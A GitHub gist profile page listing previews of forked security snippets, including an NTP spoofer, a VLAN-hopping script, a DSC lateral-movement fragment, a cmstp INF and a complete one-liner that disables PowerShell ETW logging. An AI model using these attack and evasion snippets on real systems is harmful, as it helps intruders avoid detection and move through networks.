Skip to content

Instantly share code, notes, and snippets.

View superuser5's full-sized avatar

superuser5

58 followers · 296 following
  • m00n
View GitHub Profile
@superuser5
superuser5 / pyscripter_utils.py
Created March 26, 2019 23:06 — forked from lanmaster53/pyscripter-snippets.py
Burp Python Scripter scripts
from burp import IScanIssue
class CustomIssue(IScanIssue):
def __init__(self, BasePair, Confidence='Certain', IssueBackground=None, IssueDetail=None, IssueName='Python Scripter generated issue', RemediationBackground=None, RemediationDetail=None, Severity='High'):
self.HttpMessages=[BasePair] # list of HTTP Messages
self.HttpService=BasePair.getHttpService() # HTTP Service
self.Url=BasePair.getUrl() # Java URL
self.Confidence = Confidence # "Certain", "Firm" or "Tentative"
self.IssueBackground = IssueBackground # String or None
self.IssueDetail = IssueDetail # String or None
@superuser5
superuser5 / public_keys.md
Created January 23, 2019 20:36 — forked from SciresM/public_keys.md

Nintendo Switch RSA-PKCS#1 Public Key Recovery

This is a short writeup of a fun (but ultimately pretty useless) attack I implemented on the Nintendo Switch a few months ago resulting in the recovery of some otherwise unobtainable RSA public keys. Since public keys aren't private keys, this is pretty useless, apart from letting us validate some signatures on PC. Even so, the attack is a pretty cool one, so I thought I'd write it up.

Every Switch gamecart has a unique certificate (called its "CERT"), storing an RSA signature followed by some kind of unknown but unique encrypted data. I was trying to reverse how these certificates work, and the obvious first step was to try to see how they were validated. However, when I tried looking through the FileSystem (FS) module, which should be responsible for validating these certificates, I found no references to the format at all. The "CERT" magic number was nowhere to be seen, and I couldn't find an RSA modulus that validated the signatures I had. This was in

@superuser5
superuser5 / ntpspoof.py
Created December 18, 2018 08:38 — forked from Dbof/ntpspoof.py
NTP spoofer to change the date of any victim to the year 2035
import os
import sys
import time
from subprocess import Popen, DEVNULL
import datetime
from scapy.all import IP, UDP, NTP
from netfilterqueue import NetfilterQueue
def get_switch_ip():
@superuser5
superuser5 / VLANHopperDTP.py
Created December 17, 2018 08:38 — forked from mgeeky/VLANHopperDTP.py
VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request.
#!/usr/bin/python
#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available. To be launched only in Unix/Linux environment as the
# script utilizes following applications:
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
@superuser5
superuser5 / 1080ti.md
Created August 25, 2018 00:19 — forked from epixoip/1080ti.md

Nvidia GTX 1080 Ti Hashcat Benchmarks

Software: Hashcat v3.40-49-g20057d8, Nvidia driver 378.13

Accelerator: 1x Nvidia GTX 1080 Ti FE

Highlights

  1. This card is clock-for-clock identical to the Titan X Pascal, so the numbers should not be new or surprising to anyone.
@superuser5
superuser5 / PowerShellDSCLateralMovement.ps1
Created July 11, 2018 21:07 — forked from mattifestation/PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@superuser5
superuser5 / account_checker.sh
Created June 22, 2018 12:25 — forked from haccer/account_checker.sh
PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created
#!/bin/bash
# PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created
# Use Chrome's Network tab to view the URL that makes these type of requests.
# This is just a PoC, you can add in other email services along with other domains the current ones provide.
# URLs have been working all night, but might need to be updated in the future.
#
# Usage: ./account_checker.sh <email_list>
function google() {
# Post data
@superuser5
superuser5 / cmstp.inf
Created June 22, 2018 09:00 — forked from NickTyrer/cmstp.inf
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@superuser5
superuser5 / KillETW.ps1
Created June 22, 2018 08:56 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@superuser5
superuser5 / Get-ClrReflection.ps1
Created June 22, 2018 07:53 — forked from dezhub/Get-ClrReflection.ps1
function Get-ClrReflection
{
<#
.SYNOPSIS
Detects memory-only CLR (.NET) modules
Author: Joe Desimone (@dez_)
License: BSD 3-Clause